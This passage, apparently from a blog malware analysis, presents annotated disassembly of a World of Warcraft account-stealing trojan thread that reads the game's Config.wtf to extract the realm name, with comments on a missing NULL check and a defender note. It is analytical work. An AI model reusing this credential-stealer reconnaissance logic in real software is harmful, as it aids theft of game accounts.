; and getsthbywtf(esi, "wow") are then called; if the latter returns non-zero,
; dword_1002843C is set to 1.
; NOTE: the strstr result for "realmName" is used at 10002214 without a NULL
; check, so a Config.wtf that contains "warcraftchina.com" but no "realmName"
; would make the thread read from address 0Bh.
; Defender note: a DLL-spawned thread reading the game's Config.wtf is the
; observable behaviour here.
StartthreadAddress proc near ; DATA XREF: sub_10007CEE+D2o
.text:100021AC
.text:100021AC DstBuf = byte ptr -0C00h
.text:100021AC
.text:100021AC push ebp
.text:100021AD mov ebp, esp
.text:100021AF sub esp, 0C00h ; DstBuf
.text:100021B5 push esi
.text:100021B6 push offset Mode ; "rb"
.text:100021BB push offset aWtfConfig_wtf ; "WTF\\Config.wtf"
.text:100021C0 call _fopen
.text:100021C5 mov esi, eax ; esi = FILE*
.text:100021C7 pop ecx
.text:100021C8 test esi, esi
.text:100021CA pop ecx
.text:100021CB jz loc_10002264 ; file missing: leave without touching any global
.text:100021D1 push esi ; File
.text:100021D2 push 1 ; Count
.text:100021D4 lea eax, [ebp+DstBuf]
.text:100021DA push 0C00h ; ElementSize
.text:100021DF push eax ; DstBuf - receives the file contents (fread-like argument order; presumably a fread wrapper)
.text:100021E0 call ReadFilefun
.text:100021E5 push esi ; File
.text:100021E6 call _fclose
.text:100021EB lea eax, [ebp+DstBuf]
.text:100021F1 push offset aWarcraftchina_ ; "warcraftchina.com"
.text:100021F6 push eax ; Str
.text:100021F7 call _strstr ; author: checks whether the new official WoW domain is present
.text:100021FC add esp, 1Ch
.text:100021FF test eax, eax
.text:10002201 jz short loc_10002264
.text:10002203 lea eax, [ebp+DstBuf]
.text:10002209 push offset aRealmname ; "realmName"
.text:1000220E push eax ; Str - author: the realm (server) name
.text:1000220F call _strstr
.text:10002214 add eax, 0Bh ; author: skips past the realmName key to the value; no NULL check on the strstr result
.text:10002217 push 8Ch ; Count
.text:1000221C mov esi, offset realmNamewh ; esi = global destination for the realm name
.text:10002221 push eax ; Source
.text:10002222 push esi ; Dest
.text:10002223 call _strncpy
.text:10002228 push 22h ; Val = '"'
.text:1000222A push esi ; Str
.text:1000222B call _strchr
.text:10002230 add esp, 1Ch
.text:10002233 test eax, eax
.text:10002235 jz short loc_10002264 ; no closing quote: give up
.text:10002237 push 22h ; Val
.text:10002239 push esi ; Str
.text:1000223A call _strchr
.text:1000223F and byte ptr [eax], 0 ; terminate realmNamewh at the quote
.text:10002242 push esi ; lpMultiByteStr
.text:10002243 call sub_1001A590 ; argument name hints at a multi-byte conversion; body not on this page
.text:10002248 push offset aWow ; "wow"
.text:1000224D push esi
.text:1000224E call getsthbywtf
.text:10002253 add esp, 14h
.text:10002256 test eax, eax
.text:10002258 jz short loc_10002264
.text:1000225A mov dword_1002843C, 1 ; success flag read elsewhere (not visible here)
.text:10002264
.text:10002264 loc_10002264: ; CODE XREF: StartthreadAddress+1Fj
.text:10002264 ; StartthreadAddress+55j ...
.text:10002264 pop esi
.text:10002265 leave
.text:10002266 retn ; no explicit return value is set on either path
由于该病毒较大,所以暂时看了一些比较感兴趣的东西,以后有空再补上该木马下载盗号等等的一些相关信息。。。。。。。
my blog:http://hi.baidu.com/hljleo